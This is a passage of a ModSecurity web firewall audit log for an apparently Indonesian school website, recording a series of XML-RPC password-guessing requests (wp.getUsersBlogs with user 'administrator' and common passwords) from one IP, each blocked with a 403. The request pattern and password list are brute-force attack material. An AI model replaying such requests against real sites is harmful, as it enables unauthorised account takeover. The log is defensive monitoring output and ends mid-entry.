proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077826050228 5393 (- - -) Stopwatch2: 1745077826050228 5393; combined=3810, p1=450, p2=3156, p3=0, p4=0, p5=116, sr=86, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26fdec21-Z-- --5effb900-A-- [19/Apr/2025:22:51:27 +0700] aAPGfw6cTFSgLAHl7PpLBQAAAAE 103.236.140.4 55250 103.236.140.4 8181 --5effb900-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 242 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5effb900-C-- wp.getUsersBlogs administrator smkn22-jkt.sch.id123456 --5effb900-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5effb900-E-- --5effb900-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077887863245 5027 (- - -) Stopwatch2: 1745077887863245 5027; combined=3972, p1=426, p2=3371, p3=0, p4=0, p5=102, sr=85, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5effb900-Z-- --b5960603-A-- [19/Apr/2025:22:52:34 +0700] aAPGwkruoUXZj665VUFuvwAAAM8 103.236.140.4 55574 103.236.140.4 8181 --b5960603-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b5960603-C-- wp.getUsersBlogs administrator test1 --b5960603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5960603-E-- --b5960603-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077954239472 5756 (- - -) Stopwatch2: 1745077954239472 5756; combined=3917, p1=501, p2=3243, p3=0, p4=0, p5=103, sr=91, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5960603-Z-- --374a3c26-A-- [19/Apr/2025:22:53:38 +0700] aAPHAnNa4dA2HllpK_Pk4wAAAI8 103.236.140.4 55882 103.236.140.4 8181 --374a3c26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --374a3c26-C-- wp.getUsersBlogs administrator Admin12 --374a3c26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --374a3c26-E-- --374a3c26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078018359509 4993 (- - -) Stopwatch2: 1745078018359509 4993; combined=3810, p1=456, p2=3155, p3=0, p4=0, p5=115, sr=87, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --374a3c26-Z-- --4c0a1b51-A-- [19/Apr/2025:22:54:38 +0700] aAPHPuvDiFC_ir7MDwZPuAAAAEY 103.236.140.4 56166 103.236.140.4 8181 --4c0a1b51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4c0a1b51-C-- wp.getUsersBlogs administrator nimda --4c0a1b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c0a1b51-E-- --4c0a1b51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078078713648 5315 (- - -) Stopwatch2: 1745078078713648 5315; combined=4199, p1=497, p2=3522, p3=0, p4=0, p5=106, sr=90, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c0a1b51-Z-- --6d41e22a-A-- [19/Apr/2025:22:55:38 +0700] aAPHeuvDiFC_ir7MDwZP4QAAAEU 103.236.140.4 56456 103.236.140.4 8181 --6d41e22a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6d41e22a-C-- wp.getUsersBlogs administrator 121212 --6d41e22a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d41e22a-E-- --6d41e22a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078138336663 4345 (- - -) Stopwatch2: 1745078138336663 4345; combined=3323, p1=342, p2=2805, p3=0, p4=0, p5=102, sr=74, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d41e22a-Z-- --aa588b7c-A-- [19/Apr/2025:22:56:40 +0700] aAPHuHNa4dA2HllpK_PlKQAAAI8 103.236.140.4 56940 103.236.140.4 8181 --aa588b7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --aa588b7c-C-- wp.getUsersBlogs administrator 123.456 --aa588b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa588b7c-E-- --aa588b7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078200817406 5514 (- - -) Stopwatch2: 1745078200817406 5514; combined=3899, p1=456, p2=3276, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa588b7c-Z-- --87539c7b-A-- [19/Apr/2025:22:57:40 +0700] aAPH9EruoUXZj665VUFvcgAAAMs 103.236.140.4 57280 103.236.140.4 8181 --87539c7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --87539c7b-C-- wp.getUsersBlogs administrator office --87539c7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87539c7b-E-- --87539c7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078260406869 5731 (- - -) Stopwatch2: 1745078260406869 5731; combined=4454, p1=558, p2=3669, p3=0, p4=0, p5=129, sr=129, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87539c7b-Z-- --8221a460-A-- [19/Apr/2025:22:58:44 +0700] aAPINOvDiFC_ir7MDwZQPAAAAFM 103.236.140.4 57610 103.236.140.4 8181 --8221a460-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8221a460-C-- wp.getUsersBlogs administrator Qwerty --8221a460-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8221a460-E-- --8221a460-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078324414149 5624 (- - -) Stopwatch2: 1745078324414149 5624; combined=4331, p1=529, p2=3599, p3=0, p4=0, p5=119, sr=90, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8221a460-Z-- --27378a2b-A-- [19/Apr/2025:22:59:45 +0700] aAPIcXNa4dA2HllpK_PlWwAAAIw 103.236.140.4 57916 103.236.140.4 8181 --27378a2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --27378a2b-C-- wp.getUsersBlogs administrator 123456qwe --27378a2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27378a2b-E-- --27378a2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078385417159 5213 (- - -) Stopwatch2: 1745078385417159 5213; combined=3888, p1=455, p2=3231, p3=0, p4=0, p5=126, sr=90, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27378a2b-Z-- --8a4e0971-A-- [19/Apr/2025:23:00:50 +0700] aAPIsg6cTFSgLAHl7PpL_QAAABI 103.236.140.4 58228 103.236.140.4 8181 --8a4e0971-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8a4e0971-C-- wp.getUsersBlogs administrator rockyou --8a4e0971-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a4e0971-E-- --8a4e0971-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078450210157 4929 (- - -) Stopwatch2: 1745078450210157 4929; combined=3811, p1=456, p2=3175, p3=0, p4=0, p5=106, sr=79, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a4e0971-Z-- --3637d37c-A-- [19/Apr/2025:23:01:17 +0700] aAPIzQ6cTFSgLAHl7PpMEAAAAAE 103.236.140.4 58362 103.236.140.4 8181 --3637d37c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3637d37c-C-- wp.getUsersBlogs administrator 1234%^&* --3637d37c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3637d37c-E-- --3637d37c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078477680564 4420 (- - -) Stopwatch2: 1745078477680564 4420; combined=3349, p1=361, p2=2824, p3=0, p4=0, p5=97, sr=78, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3637d37c-Z-- --d273f953-A-- [19/Apr/2025:23:01:50 +0700] aAPI7kruoUXZj665VUFv3AAAAM8 103.236.140.4 58534 103.236.140.4 8181 --d273f953-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d273f953-C-- wp.getUsersBlogs administrator 7777777 --d273f953-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d273f953-E-- --d273f953-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078510029782 5304 (- - -) Stopwatch2: 1745078510029782 5304; combined=3933, p1=465, p2=3300, p3=0, p4=0, p5=99, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d273f953-Z-- --df845300-A-- [19/Apr/2025:23:02:53 +0700] aAPJLQ6cTFSgLAHl7PpMOAAAABY 103.236.140.4 58874 103.236.140.4 8181 --df845300-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --df845300-C-- wp.getUsersBlogs administrator dubsmash --df845300-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df845300-E-- --df845300-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078573262428 5554 (- - -) Stopwatch2: 1745078573262428 5554; combined=4126, p1=510, p2=3435, p3=0, p4=0, p5=107, sr=92, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df845300-Z-- --9cacd25d-A-- [19/Apr/2025:23:03:53 +0700] aAPJaQ6cTFSgLAHl7PpMXwAAAAc 103.236.140.4 59154 103.236.140.4 8181 --9cacd25d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9cacd25d-C-- wp.getUsersBlogs administrator Testing1 --9cacd25d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cacd25d-E-- --9cacd25d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078633343494 5190 (- - -) Stopwatch2: 1745078633343494 5190; combined=3663, p1=432, p2=3047, p3=0, p4=0, p5=106, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cacd25d-Z-- --5070705d-A-- [19/Apr/2025:23:04:58 +0700] aAPJquvDiFC_ir7MDwZQpgAAAEc 103.236.140.4 59436 103.236.140.4 8181 --5070705d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5070705d-C-- wp.getUsersBlogs administrator bubbles --5070705d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5070705d-E-- --5070705d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (14+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078698339224 5516 (- - -) Stopwatch2: 1745078698339224 5516; combined=3925, p1=445, p2=3228, p3=0, p4=0, p5=141, sr=85, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5070705d-Z-- --f6de3f27-A-- [19/Apr/2025:23:06:00 +0700] aAPJ6HNa4dA2HllpK_PluwAAAJU 103.236.140.4 59758 103.236.140.4 8181 --f6de3f27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f6de3f27-C-- wp.getUsersBlogs administrator melissa --f6de3f27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6de3f27-E-- --f6de3f27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file 